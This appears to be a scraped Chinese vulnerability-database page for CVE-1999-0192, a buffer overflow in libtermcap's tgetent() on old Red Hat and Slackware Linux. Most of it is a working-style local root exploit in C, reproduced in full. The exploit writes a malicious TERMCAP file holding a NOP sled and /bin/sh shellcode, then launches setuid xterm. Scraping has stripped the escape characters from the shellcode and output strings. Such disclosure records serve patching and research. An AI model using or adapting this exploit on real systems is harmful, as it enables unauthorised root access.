Telnet daemon tgetent routing权限许可和访问控制漏洞

Telnet daemon tgetent routing权限许可和访问控制漏洞

漏洞ID 1105516 漏洞类型 缓冲区溢出
发布时间 1999-08-18 更新时间 2005-05-02
图片[1]-Telnet daemon tgetent routing权限许可和访问控制漏洞-安全小百科CVE编号 CVE-1999-0192
图片[2]-Telnet daemon tgetent routing权限许可和访问控制漏洞-安全小百科CNNVD-ID CNNVD-199710-016
漏洞平台 Linux CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/19465
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199710-016
|漏洞详情
Telnetdaemontgetentrouting存在缓冲区溢出漏洞。远程攻击者可以借助TERMCAP环境变量获得根访问权限。
|漏洞EXP
source: http://www.securityfocus.com/bid/588/info
 
A buffer overflow existed in libtermcap's tgetent() function, which could cause the user to execute arbitrary code if they were able to supply their own termcap file. Versions of libtermcap 2.0.8 and earliear are vulnerable.
 
Under Red Hat Linux 5.2 and 4.2, this could lead to local users gaining root privileges, as xterm (as well as other possibly setuid programs) are linked against libtermcap. Under Red Hat Linux 6.0, xterm is not setuid root.
 
Debian and Caldera OpenLinux use the ncurses library instead of termcap and thus are not vulnerable.

/* Local exploit for suid root programs linked to libtermcap < 2.0.8-15 
 *
 * tested with xterm and nxterm on RedHat 5.2 and 4.2
 *
 * [email protected]
 * http://www.lucid-solutions.com
 *
 * Usage:
 * ./smashcap  		-default is buffer size of 4210 and offset of 300
 *			 and seems to work on RH 5.2
 *
 * Adjust offsets (somewhere between 230 - 1140) if necessary
 *
 * ./smashcap <offset> 	-buffer size defaults to 4210
 * ./smashcap <offset> <buffersize>
 *
 *
 * In order to stop script kids/opportunists, one MINOR change must be
 * made in order for this to work.  
 *
 * Use only to test your machines to show you that you must patch libtermcap.
 * Quick fix, chmod u-s ALL suid root programs linked with libtermcap.
 *
 *						- sk8 of LS
 *
 */

#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>

#define filename "/tmp/lstermcap"
#define entry1   "xterm|"
#define DEFAULT_BUFSIZE 4210

char shellcode[] =
  "xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b"
  "x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd"
  "x80xe8xdcxffxffxff/bin/sh"; /* Linux shellcode */

long get_sp(void)
{
   __asm__("movl %esp, %eaxn");
}

int main(int argc, char *argv[]) {
   int bufsize, offset, i, fd;
   long *bufptr;
   char *ptr, *buffer, *tempbuf;

   setenv("TERMCAP", "/tmp/lstermcap", 1);


   bufsize=DEFAULT_BUFSIZE;

   if (argc > 2) bufsize=atoi(argv[2]);
   if (argc > 1) offset=atoi(argv[1]);
   else offset=300;
  

   printf("bufsize: %inoffset: %in", bufsize,offset);

   if(!(buffer = malloc(bufsize))) {
      printf("can't allocate enough memoryn");
      exit(0);
   }
  if(!(tempbuf = malloc(bufsize+strlen(entry1) ))) {
      printf("can't allocate enough memoryn");
      exit(0);
   }

   printf("get_sp(): 0x%xn", get_sp());
   printf("get_sp()-offs: 0x%xn", (get_sp()-offset) );

   ptr=buffer;
   bufptr = (long *)(buffer+2); /* align */

   for (i = 0; i < bufsize; i += 4)
      	*(bufptr++) = (get_sp()-offset);

   	for (i = 0; i < (bufsize/2); i++) 
     		 buffer[i] = 0x90;

	ptr=buffer + ((bufsize/2) - strlen(shellcode)/2);
  	for (i = 0; i < strlen(shellcode); i++)
      		*(ptr++) = shellcode[i]; //shellcode


  	ptr=ptr+24;

	/* now insert the characters : and  into the termcap - these are vital */
  	*(ptr++)=0x3a;  
  	*(ptr++)=0x5c;  


   	snprintf(tempbuf, (bufsize+strlen(entry1)), "%s%s%s", entry1, buffer);
   	fd = open(filename, O_WRONLY|O_CREAT|O_TRUNC, 0666);
   	write (fd, tempbuf, strlen(tempbuf));
   	close(fd);
	printf("made termcapn");

	execl("/usr/X11R6/bin/xterm","xterm", 0);
	
}
|参考资料
VulnerablesoftwareandversionsConfiguration1OR*cpe:/o:redhat:linux:4.0*cpe:/o:redhat:linux:4.1*cpe:/o:redhat:linux:4.2*cpe:/o:redhat:linux:5.0*cpe:/o:redhat:linux:5.1*cpe:/o:redhat:linux:5.2::i386*cpe:/o:redhat:linux:6.0::i386*cpe:/o:slackware:slackware_linux:3.2*cpe:/o:slackware:slackware_linux:3.3*cpe:/o:slackware:slackware_linux:3.4*cpe:/o:slackware:slackware_linux:3.5*cpe:/o:slackware:slackware_linux:3.6*cpe:/o:slackware:slackware_linux:3.9*cpe:/o:slackware:slackware_linux:4.0*DenotesVulnerableSoftware*ChangesrelatedtovulnerabilityconfigurationsTechnicalDetailsVulnerabilityType(ViewAll)CVEStandardVulnerabilityEntry:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0192

相关推荐: PHPBB2 Plus 1.5 – ‘index.php’ Multiple Cross-Site Scripting Vulnerabilities

PHPBB2 Plus 1.5 – ‘index.php’ Multiple Cross-Site Scripting Vulnerabilities 漏洞ID 1055005 漏洞类型 发布时间 2005-04-13 更新时间 2005-04-13 CVE编…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享